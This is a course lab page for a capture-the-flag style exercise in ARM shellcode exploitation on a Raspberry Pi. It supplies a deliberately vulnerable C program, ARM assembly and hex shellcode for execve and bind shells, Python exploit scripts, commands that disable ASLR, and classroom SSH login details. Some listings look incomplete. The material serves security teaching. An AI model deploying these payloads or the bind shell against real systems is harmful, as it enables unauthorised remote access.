ED 413: ARM Shellcode on the Pi (30 pts)

What You Need


To learn more about ARM assembly and shellcode.

Configuring the Pi

You need to configure your Pi to be a headless SSH server, as explained here:


Connect to your Pi with SSH using these credentials:

Username: pi
Password: raspberry

Pi in the Sky

You can connect to a Pi in our classroom like this:
  • ssh pi@ad.samsclass.info -p 11130
  • vnc://ad.samsclass.info:11131
The password is notraspberry

Thanks to 7Lowe for the name :)

Making a Working Folder

In your SSH session, execute this command, replacing "YOURNAME" with your own name.


Making a Vulnerable Program

We'll use a program with a buffer overflow, and which takes input in raw hexadecimal so we can use any bytes we like, even null bytes.

In your SSH session, execute this command:

nano pwd3.c
Enter this code, as shown below:

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>

char hex[801], raw[401];
int len;

void hex2raw() {
	printf("Enter password in hex:");
	int i, j1, j2, k, n;
	fgets(hex, 800, stdin);
	n = strlen(hex);
	printf("Input length: %d\n", n);
	if ( (n < 3) || (n%2 == 0) ) {
		printf("ERROR: Input length must be even.\n");
	len = n/2;
	for(i=0; i<n; i++) {
		hex[i] = tolower(hex[i]);
	printf("You entered: %s\n", hex);
	for(i=0; i<n-1; i+=2) {
		j1 = hex[i] - '0';
		if (j1 > 9) { j1 = 10 + hex[i] - 'a'; }
		j2 = hex[i+1] - '0';
		if (j2 > 9) { j2 = 10 + hex[i+1] - 'a'; }
		k = 16*j1 + j2;
		if (k < 0 || k > 255) {
			printf("ERROR: Illegal characters encountered: %c%c.\n",
				hex[i], hex[i+1]);
		raw[i/2] = k;

void test_pw() {
    int i;
    char password[10];
    memcpy(password, raw, len);
    printf("Stack: Password at: %p\n", password);
    printf("Text: test_pw at: %p\n", test_pw);
    printf("Global: raw at: %p\n", raw);

void main() {
    printf("All done!\n");
Save the file with Ctrl+X, Y, Enter.

Now execute these commands:

gcc -g -o pwd3 pwd3.c
The program runs, printing out "All done!", as shown below:

Planning the Exploit

We'll examine the stack under normal conditions first.

Execute these commands:

gdb -q pwd3
list 35,45
Notice the "memcpy" command in line 41, as shown below.

A classic stack buffer overflow happens here, as the "raw" data is copied into the "password" string without correctly limiting its length.

Execute these commands, one at a time, to set a breakpoint after the "memcpy: command, run the program with a short password, and examine the stack:

break 45
x/50x $sp
Note these features in the image below:

Disabling ASLR

Address Space Layout Randomization is a defense feature to make buffer overflows more difficult, and all modern operating systems uses it by default.

To see it in action, run the "pwd3" program several times with a password of 41. The password address is different every time, as shown below.

ASLR makes you much safer, but it's an irritation we don't need for the first parts of this project, so we'll turn it off.

In a Terminal, execute these commands, as shown below.

sudo su -
echo 0 > /proc/sys/kernel/randomize_va_space
Run the "pwd32" program several times again with a password of 41. The password address is now the same every time, as shown below.

Understanding Linux System Calls

To use hardware, like the monitor or the network interface, programs use "system calls."

As shown here, ARM system calls operate this way:

The Linux system call numbers are shown here (use the "arm" column). Here are the ones we'll use:

Making "HELLO" Shellcode

First let's make the traditional simplest shellcode that simply prints out a message.

In your SSH session, execute this command:

nano write.s
Enter this code:

.global _start

   mov r0, #1               // STDOUT
   adr r1, hello            // memory address of string
   mov r2, #6               // size of string
   mov r7, #4               // write syscall #
   svc #0                   // invoke syscall

   mov r7, #1               // exit syscall #
   svc 0                    // invoke syscall
.ascii "HELLO\0"
Save the file with Ctrl+X, Y, Enter.

Execute these commands to compile, link, and run your shellcode, and to see its disassembly.

as write.s -o write.o
ld write.o -o write
objdump -d write
The program runs, printing out "HELLO, as shown below.

Notice the shellcode bytes, outlined in yellow in the image below. Each instruction is 32 bits long, and there are a lot of null bytes. This sort of shellcode can't be used in normal string injection situations, but it will work for our "pwd3" program.

Execute these commands to extract and print out the shellcode in hexadecimal:

objcopy -O binary write write.bin
xxd -ps write.bin
The shellcode appears as a string of hexadecimal characters, as shown below.

Exploiting Pwd3

Now we'll write a Pyton script to construct a complete exploit.

In your SSH session, execute this command:

nano pwd3a.py
Enter this code, replacing the hexadecimal shellcode in "buf" with the shellcode you just created above with xxd.

prefix = "41414141424242424343434344444444"
eip = "b0f2ff7e"
nopsled = "0110a0e1" * 30

buf =  "0100a0e310108fe20620a0e30470a0e3000000ef0170a0e3000000ef4845"
buf += "4c4c4f000000"

print prefix + eip + nopsled + buf
Save the file with Ctrl+X, Y, Enter.

Execute this command to run the exploit:

python pwd3a.py | ./pwd3
The exploit works, printing out "HELLO", as shown below.

Viewing the Exploit in a Debugger

Execute these commands:

python pwd3a.py > pwd3a
gdb -q pwd3
run < pwd3a
The exploit works, printing out "HELLO", as shown below.

At the (gdb) prompt, execute these commands:

list 35,45
break 45
run < pwd3a
x/50x $sp
The shellcode appears on the stack, as shown below.

Note the return pointer, outlined in green in the image below.

Execute this command, entering the correct address of the return pointer on your system.

x/20i 0x7efff2b0
The shellcode appears, as shown below. The NOP sled consists of a series of "mov r1, r1" instructions and the "write" shellcode uses two "svc 0x00000000" instructions.

The last line is strange, because it's not actually a machine language instruction--it's an ASCII string.

To see the string, Execute this command, entering the correct address of the last displayed instruction on your system.

x/s 0x7efff2fc

Executable Stack

Why did this work? gcc should not allow code on the stack to execute by default, but, as shown below, it does.

This is a known problem with the Raspberry Pi.

ED 413.1: Send a BEL Character (5 pts)

Use the form below. Send a string 20 characters long ending in a BEL (ASCII code 7) to see the flag.

ED 413.2: Run the win() Function (10 pts)

Redirect execution to the win() function to see the flag.

ED 413.1 & 413.2: Hex Processor

Hexadecimal Data:


  • It's easier to use the direct URL instead of the form, like http://ad.samsclass.info:11111/ED413.2.php?string=414141&submit=debug

Making "execve" Shellcode

Next we'll make shellcode that opens a local shell, creating a new process. We won't need to call "exit" because "execve" never returns.

In your SSH session, execute this command:

nano execve.s
Enter this code:

.section .text
.global _start

   adr r0, binsh    // Address of "/bin/sh"
   eor r1, r1, r1   // r1 = 0
   eor r2, r2, r2   // r2 = 0
   mov r7, #11      // execve syscall #
   svc #0           // invoke syscall

.ascii "/bin/sh\0"
Save the file with Ctrl+X, Y, Enter.

Execute these commands to compile, link, and run your shellcode, and to see its disassembly.

as execve.s -o execve.o
ld execve.o -o execve
objdump -d execve
The program runs, opening a "dash" shell, as shown below.

Execute these commands to extract and print out the shellcode in hexadecimal:

objcopy -O binary execve execve.bin
xxd -ps execve.bin
The shellcode appears as a string of hexadecimal characters, as shown below.

Exploiting Pwd3

In your SSH session, execute this command:

nano pwd3b.py
Enter this code, replacing the hexadecimal shellcode in "buf" with the shellcode you just created above with xxd.

prefix = "41414141424242424343434344444444"
eip = "b0f2ff7e"
nopsled = "0110a0e1" * 30

buf =  "0c008fe2011021e0022022e00b70a0e3000000ef2f62696e2f736800"

print prefix + eip + nopsled + buf
Save the file with Ctrl+X, Y, Enter.

Execute this command to display the exploit:

python pwd3b.py
The exploit is displayed in hexadecimal, as shown below.

Highlight it and copy it into the Clipboard.

Execute this command to launch pwd3:

At the "Password" prompt, paste in the exploit code and press Enter.

The dash shell opens, as shown below. Type exit to exit from it.

Bind Shellcode

Bind shellcode listens on a TCP port. That will require several more system calls.

In your SSH session, execute this command:

nano bind.s

.section .text
.global _start

       // socket(2, 1, 0)
    mov  r0, #2
    mov  r1, #1
    eor  r2, r2, r2
    mov  r7, #200
    add  r7, #81
    svc  #0
    mov  r3, r0

       // bind(fd, &sockaddr, 16)
    adr  r1, struct_addr
    mov  r2, #16
    mov  r7, #200
    add  r7, #82
    svc  #0

       // listen(host_sockid, 2)
    mov  r0, r3
    mov  r1, #2
    mov  r7, #200
    add  r7, #84
    svc  #0

       // accept(host_sockid, 0, 0)
    mov  r0, r3
    eor  r1, r1, r1
    eor  r2, r2, r2
    mov  r7, #200
    add  r7, #85
    svc  #0

    mov  r3, r0
    mov  r1, #3
    mov  r7, #63

       // dup2(client_sockid, 2)
       // -> dup2(client_sockid, 1)
       // -> dup2(client_sockid, 0)
    mov  r0, r3
    sub  r1, r1, #1
    svc  #0
    cmp  r1, r2
    bne  duploop

       // execve("/bin/sh", 0, 0)
    adr  r0, spawn
    mov  r7, #11
    svc  #0

.ascii "\x02\x00"   // AF_INET = 2 for IPv4
.ascii "\x11\x5c"   // Port 4444 in hex
.byte 0,0,0,0		// IP address

.ascii "/bin/sh\0"
Note that it takes two ARM instructions to load a register with an arbitrary value larger than 255, as explained here.

as -o bind.o bind.s
ld -o bind bind.o
./bind &
ss -ltnp| sed 's/  */ /g'
You see the "bind" process listening on port 4444, as shown below.

Execute these commands to extract and print out the shellcode in hexadecimal:

objcopy -O binary bind bind.bin
xxd -ps bind.bin
The shellcode appears as a blob of hexadecimal characters, as shown below.

Using the Bind Shell

Execute these commands to connect to the bind shell, use it, and close it.

nc 4444
The shell works, as shown below.

Exploiting Pwd3

In your SSH session, execute this command:

nano pwd3c.py
Enter this code, replacing the hexadecimal shellcode in "buf" with the shellcode you just created above with xxd.

prefix = "41414141424242424343434344444444"
eip = "b0f2ff7e"
nopsled = "0110a0e1" * 30

buf =  "0200a0e30110a0e3022022e0c870a0e3517087e2000000ef0030a0e16xxx"
buf += "8fe21020a0e3c870a0e3527087e2000000ef0300a0e10210a0e3c870axxx"
buf += "547087e2000000ef0300a0e1011021e0022022e0c870a0e3557087e20xxx"
buf += "00ef0030a0e10310a0e33f70a0e30300a0e1011041e2000000ef02005xxx"
buf += "faffff1a0c008fe20b70a0e3000000ef0200115c000000002f62696e2xxx"
buf += "6800"

print prefix + eip + nopsled + buf
Save the file with Ctrl+X, Y, Enter.

Execute these commands to run the exploit and display the results:

python pwd3c.py | ./pwd3 &
ss -ltnp| sed 's/  */ /g'
as shown below.

Using the Bind Shell

Execute these commands to connect to the bind shell, use it, and close it.

nc 4444
The shell works, as shown below.

Running the Bind Shell in the Debugger

Execute this command to display the exploit:

python pwd3c.py
The exploit is displayed in hexadecimal, as shown below.

Highlight it and copy it into the Clipboard.

Flag ED 413.3: New Program (15 pts)

Execute these commands to launch pwd3 in the debugger:

gdb -q pwd3
At the "Password" prompt, paste in the exploit code and press Enter.

Open another SSH session to your Raspberry Pi and execute this command:

nc 4444

The flag is covered by a green rectangle in the image below.


ARMv6-M Architecture Reference Manual
wget/curl large file from google drive
gdb_exception_RETURN_MASK_ERROR #206
Compiling a Debian package with debug symbols
Cross compiling for ARM with Ubuntu 16.04 LTS
17. Debugging Remote Programs
Raspbian GDB broken
Raspberry Pi: debugging with gdb, command line
Raspberry Pi: C++ cross-compiling
BL instruction ARM - How does it work
Shellcode: Linux ARM Thumb mode
Linux ARM Shellcode - Part 2 - Removing NULLs
Shellcodes database for study cases
How to Create a Shellcode on ARM Architecture
Polymorphic Shellcode Generator For ARM Architecture
Linux/ARM - Bind ( Shell (/bin/sh) + Null-Free Shellcode (92 Bytes)
Linux ARM Shellcode - Part 1 - Syscalls
ARM: QEMU crashes with segmentation fault on supervisor call
Writing shellcode for IoT: Password-Protected Reverse Shell (Linux/ARM)
Why is the stack segment executable on Raspberry Pi?
ARM Assembly Language Using the Raspberry Pi
Arm Exploit Development Trainings & Tutorials
ARM Exploit Development
QEMU gdb server thread problem
Is there a portable equivalent to DebugBreak()/__debugbreak?
Raspberry Pi Educational computing in the cloud
miniNodes ARM Servers

Posted 12-9-19
Image showing memory protections fixed 12-11-19
Cloud Pi credentials added 12-11-19 5 pm
Step added to make flag appear 12-11-19 9 pm
ED412.2-4 added 12-12-19